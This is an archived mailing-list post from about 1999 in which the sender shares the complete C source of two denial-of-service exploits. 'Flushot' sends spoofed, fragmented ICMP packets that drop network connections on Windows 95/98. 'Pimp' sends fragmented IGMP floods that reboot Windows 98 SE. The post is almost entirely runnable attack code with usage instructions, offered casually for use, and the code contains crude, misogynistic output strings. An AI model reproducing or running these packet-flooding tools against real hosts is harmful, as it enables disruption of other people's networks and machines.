I got two exploit and test it... - The first one is Flushot by DarkShow. This exploit can drop the = network connection in windows 95 and 98(First Edition) - The other one is Pimp by Rob Mosher, this exploit can reboot = Windows98se I have Rethat linux 5.0 installed.... Now... the exploits.. Sorry.. my english is a shit... Have fun.. ----------[FluSHOT.c START CUT = HERE]-------------------------------------------------- /* Lags CPU Made By DarkShadow from The flu Hacking Group Kills Win95-98 machines */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> void banner(void) { =20 printf("Remote Flushot v 1.0\n\n"); =20 =20 printf("\n\n"); } void usage(const char *progname) { printf(" usage:\n"); printf("./flushot [Spoofed IP] [Destination IP] [# of FLushot to = Send]\n",progname); printf(" [Spoofed IP] : ex: 205.56.78.0\n"); printf(" [Destination IP] : ex: 201.12.3.76\n"); printf(" [# of FLushot to Send] : 100\n"); printf("The Flu Hacking Group (c)\n"); printf("DarkShadow PlimoMan Hack The Planet\n"); } int resolve( const char *name, unsigned int port, struct sockaddr_in = *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family =3D AF_INET; addr->sin_addr.s_addr =3D inet_addr(name); if (addr->sin_addr.s_addr =3D=3D -1) { if (( host =3D gethostbyname(name) ) =3D=3D NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family =3D host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port =3D htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft =3D len; register u_short *w =3D addr; register int sum =3D 0; u_short answer =3D 0; while (nleft > 1) { sum +=3D *w++; nleft -=3D 2; } if (nleft =3D=3D 1) { *(u_char *)(&answer) =3D *(u_char *)w ; sum +=3D answer; } sum =3D (sum >> 16) + (sum & 0xffff); sum +=3D (sum >> 16); =20 answer =3D ~sum; =20 return(answer); } int send_winbomb(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet =3D (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip =3D (struct iphdr *)packet; icmp =3D (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl =3D 5; ip->version =3D 4; // ip->tos =3D 2; ip->id =3D htons(1234); ip->frag_off |=3D htons(0x2000); // ip->tot_len =3D 0; ip->ttl =3D 30; ip->protocol =3D IPPROTO_ICMP; ip->saddr =3D spoof_addr; ip->daddr =3D dest_addr->sin_addr.s_addr; ip->check =3D in_cksum(ip, sizeof(struct iphdr)); icmp->type =3D 12; icmp->code =3D 0; icmp->checksum =3D in_cksum(icmp,sizeof(struct icmphdr) + = 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) =3D=3D -1) { return(-1); } ip->tot_len =3D htons(sizeof(struct iphdr) + sizeof(struct icmphdr) = + 8); ip->frag_off =3D htons(8 >> 3); ip->frag_off |=3D htons(0x2000); ip->check =3D in_cksum(ip, sizeof(struct iphdr)); icmp->type =3D 0; icmp->code =3D 0; icmp->checksum =3D 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) =3D=3D -1) { return(-1); } free(packet); return(0); } int main(int argc, char * *argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc !=3D 4)) { usage(argv[0]); return(-1); } if((sock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket.\n"); return(-1); } if (resolve(argv[1],0,&dest_addr) =3D=3D -1) { return(-1); } src_addr =3D dest_addr.sin_addr.s_addr; if (resolve(argv[2],0,&dest_addr) =3D=3D -1) { return(-1); } printf("Status: Connected....packets sent.\n",argv[0]); for (i =3D 0;i < atoi(argv[3]);i++) { if (send_winbomb(sock, src_addr, &dest_addr) =3D=3D -1) { fprintf(stderr,"ERROR: Unable to Connect To luser.\n"); return(-1); } usleep(10000); } } ----------[FluSHOT.c END CUT = HERE]-------------------------------------------------- ----------[Pimp.c START CUT = HERE]-------------------------------------------------- /* ** pimp.c 6/4/99 by Rob Mosher: nytat_private ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp <host> */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <sys/socket.h> struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc !=3D 2) ERROR("usage: pimp <host>"); if((nsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) =3D=3D -1) ERROR("could not create raw socket"); pkt =3D malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip =3D (struct ip *) pkt; nigmp =3D (struct igmp *) (pkt + sizeof(struct ip)); data =3D (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr =3D resolve(argv[1]); nip->ip_v =3D 4; nip->ip_hl =3D 5; nip->ip_tos =3D 0; nip->ip_id =3D 69; nip->ip_ttl =3D 255; nip->ip_p =3D IPPROTO_IGMP; nip->ip_sum =3D 0; nip->ip_dst.s_addr =3D s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr =3D 2147100000; nigmp->igmp_type =3D 2; nigmp->igmp_code =3D 31; nigmp->igmp_cksum =3D 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr =3D 0;ctr < 15;ctr++) { printf("."); nip->ip_len =3D 1500; nip->ip_off =3D htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off =3D htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off =3D htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len =3D 831; nip->ip_off =3D htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he =3D gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; } ----------[Pimp.c END CUT = HERE]-------------------------------------------------- -- Hector Leon -- darksun@computer-maniacs.com --CiMOS Computers Rep. Dom.--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:52:12 PDT